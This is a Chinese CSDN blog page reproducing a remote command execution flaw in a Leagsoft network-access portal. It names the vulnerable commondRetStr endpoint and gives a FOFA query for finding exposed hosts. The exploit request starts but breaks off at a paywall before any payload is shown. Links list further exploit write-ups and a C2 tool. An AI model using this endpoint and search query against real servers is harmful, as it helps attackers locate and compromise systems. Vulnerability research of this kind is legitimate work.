【漏洞复现】联软科技安全准入门户平台RCE(命令执行)漏洞

最新推荐文章于 2024-05-14 17:48:38 发布

李火火安全阁

最新推荐文章于 2024-05-14 17:48:38 发布

阅读量2.6k

点赞数 1

分类专栏：漏洞复现文章标签：联软准入

本文链接：https://blog.csdn.net/weixin_46944519/article/details/131068652

版权

漏洞复现专栏收录该内容

99 篇文章 ¥19.90 ¥99.00

订阅专栏

超级会员免费看

文章目录

前言
声明
一、漏洞描述
二、影响平台
三、漏洞复现
四、修复方案

前言

联软科技安全准入门户平台 commondRetStr处存在远程代码执行漏洞，攻击者可以获取服务器权限。

声明

本篇文章仅用于漏洞复现与技术研究，请勿利用文章内的相关技术从事非法测试，所产生的一切不良后果与文章作者无关。该文章仅供学习用途使用！！！

一、漏洞描述

联软科技安全准入门户平台 commondRetStr处存在远程代码执行漏洞，攻击者可以获取服务器权限。

二、影响平台

联软准入平台

三、漏洞复现

FOFA查询语句: UniSSOView
在这里插入图片描述
EXP如下：

POST /TunnelGateway/commondRetStr HTTP/1.1
Host: 127.0.0.1
Cookie: sdp_jsessionid=3CB52344DCF9F184FA8AC82AC099F08A; sdp_verify_key&#

了解本专栏

订阅专栏解锁全文

超级会员免费看

确定要放弃本次机会？

福利倒计时

: :

立减 ¥

普通VIP年卡可用

立即使用

李火火安全阁

关注关注

1
点赞
踩
0

收藏

觉得还不错? 一键收藏
0
评论
分享

复制链接

分享到 QQ

分享到新浪微博

扫一扫
打赏
打赏
打赏举报

举报

专栏目录

订阅专栏

联软科技安全准入门户平台commondRetStr接口RCE漏洞复现[附POC]

薛定谔嘚喵博客

04-28

721

联软科技是全球最早的网络准入控制厂商之一,联软科技再获亿级的融资,得到资本的高度认可。联软科技安全准入门户平台 /commondRetStr接口处存在远程代码执行漏洞，攻击者可以获取服务器权限。

联软 IT 安全运维管理软件反序列化漏洞复现

0xSec

11-30

2410

联软IT安全运维管理软件，在 PolicySetDetailController 中的queryPolicyUseConditionDetail 方法在对输入参数进行处理的过程中进行了反序列化操作，可使用 Commons-Beanutils 反序列化链进行RCE。攻击者可利用该漏洞执行任意代码，在服务器上执行命令、打入内存马等操作，获取服务器权限。

参与评论您还未登录，请先登录后发表或查看评论

联软科技产品「准入」存在任意文件上传和命令执行漏洞

m0_48520508的博客

09-25

5294

1、准入系统概述网络准入这一概念是由思科发起、后续由华为、联软、北信源等多家厂商根据此概念，基于在NACC、802.1x、EOU、WebAuth、MAB、IAB的基础上进行自主研发的一门新兴技术。其宗旨是防止病毒和蠕虫等新兴黑客技术对企业安全造成危害，为企业建设一套网络安全体系。 2、联软UniNAC网络准入控制系统功能 • 发现自动发现网络设备、自动发现接入设备、自动发现网络拓扑；自动发现接入设备的类型，包

gmailc2：一款基于Google SMTP的完全无法检测的C2服务器

qq_53058639的博客

07-24

1320

1、持久化；2、支持Shell访问；3、查看系统信息；4、…

【漏洞复现】联软科技安全准入门户平台 commondRetStr 存在远程命令执行漏洞

https://blog.echo234.cn/

03-26

790

联软科技是全球最早的网络准入控制厂商之一,联软科技再获亿级的融资,得到资本的高度认可。联软科技安全准入门户平台 commondRetStr 处存在远程代码执行漏洞，攻击者可以获取服务器权限。

网络安全入门笔记（共327页），助你步入安全门槛

Spontaneous_0的博客

01-31

826

网络安全入门笔记（共327页），助你步入安全门槛

联软安渡 UniNXG 安全数据交换系统任意文件读取漏洞复现

最新发布

0xSec

05-14

2152

联软安渡 UniNXG 安全数据交换系统 /UniExServices/poserver.zz 接口任意文件读取漏洞，未经身份验证的攻击者可利用此漏洞构造加密的恶意请求读取系统内部敏感文件，造成数据泄露，导致系统处于极不安全的状态。

Spring RCE 漏洞 CVE-2022-22965复现分析

m0_61506558的博客

09-19

5997

关于CVE-2022-22965漏洞的环境调试和内容，网上看了一波，感觉有些知识点内容还是必须要了解才能理解该漏洞，为此详细写了下从Spring框架结构分析，环境搭建到漏洞分析调试整体的一个过程理解，在遇到其他类型的漏洞也可以去调试运用。(一）了解Spring框架由于本文主要介绍漏洞原理流程，所以有关框架不会具体展开，会将涉及到的内容进行解释。1、

远程代码执行漏洞（CVE-2022-30190）

weixin_47623655的博客

03-30

538

近期发现了一项关于 Microsoft Support Diagnostic Tool (MSDT) 的远程代码执行漏洞，该漏洞被命名为CVE-2022-30190。在此漏洞的攻击中，攻击者可以利用漏洞远程执行代码，从而实现对受影响系统的完全控制。本文将对CVE-2022-30190进行深入的分析。CVE-2022-30190漏洞是一项非常危险的远程代码执行漏洞，攻击者可以利用该漏洞来执行任意代码，并最终控制受感染系统。由于CVE-2022-30190漏洞的严重性，任何未受影响的系统都可能受到攻击。

Apache Druid RCE漏洞复现(QVD-2023-9629)

0xSec

04-26

4733

在Apache Druid使用Apache Kafka加载数据的场景下，未经身份认证的远程攻击者可配置Kafka连接属性，从而利用CVE-2023-25194漏洞触发JNDI注入，最终执行任意代码。

联软安界UniSDP软件定义边界系统命令执行（含批量验证poc）

weixin_43567873的博客

04-05

486

联软安界UniSDP软件定义边界系统命令执行（含批量验证poc）

什么是RCE漏洞？如何修复该漏洞？

oldboyedu1的博客

03-15

760

RCE全称为remote command/code execute，即远程命令执行)漏洞，一般出现这种漏洞，是因为应用系统从设计上需要给用户提供指定的远程命令操作的接口，比如我们常见的路由器、防火墙、入侵检测等设备的web管理界面上。产生RCE漏洞的根本原因在于，服务器像php环境版本对可执行变量函数没有做过滤，导致在没有自定义相对路径的情况下就运行命令去执行,从而导致服务器被入侵。2、尽量不要使用命令执行函数，不能完全控制的危险函数最好不使用，如果非要用的话可以加验证防止被其他人利用。

YARN 远程代码执行（RCE）安全漏洞问题分析与解决方案

明哥的IT随笔

04-26

1630

某客户使用Tenable.sc扫描安全漏洞后反馈，YARN 存在Remote code execution (RCE) 安全漏洞问题，攻击者可在未经过身份验证的情况下通过该漏洞在受影响主机执行任意命令，最终控制服务器。

【漏洞案例】云上攻防之云主机中web应用自身漏洞

Websec

06-28

772

最近在做项目的时候，测到了一个部署在云上的存在 Laravel UEditor SSRF 漏洞的站点，并且发现这个 SSRF 漏洞可以读取到临时凭证，这不巧了，正好最近写了一个云环境利用的工具。开始之前这里先简单介绍一下这个工具，CF 是这个工具的名字，通过它可以很方便的进行云上内网渗透，比如一键在所有实例上执行命令、一键接管控制台、一键列出云服务资源等等。

Thinkphp5.0.23-rce漏洞复现

qq_64875725的博客

06-02

2708

ThinkPHP是一款运用极广的PHP开发框架。其5.0.23以前的版本中，获取method的方法中没有正确处理方法名，导致攻击者可以调用Request类任意方法并构造利用链，从而导致远程代码执行漏洞。: 'GET';} elseif (!} else {

UniSSOView 任意命令执行复现

失心少年

07-29

382

联软科技安全准入门户平台 commondRetStr处存在远程代码执行漏洞，攻击者可以获取服务器权限。

禅道项目管理系统RCE漏洞复现+利用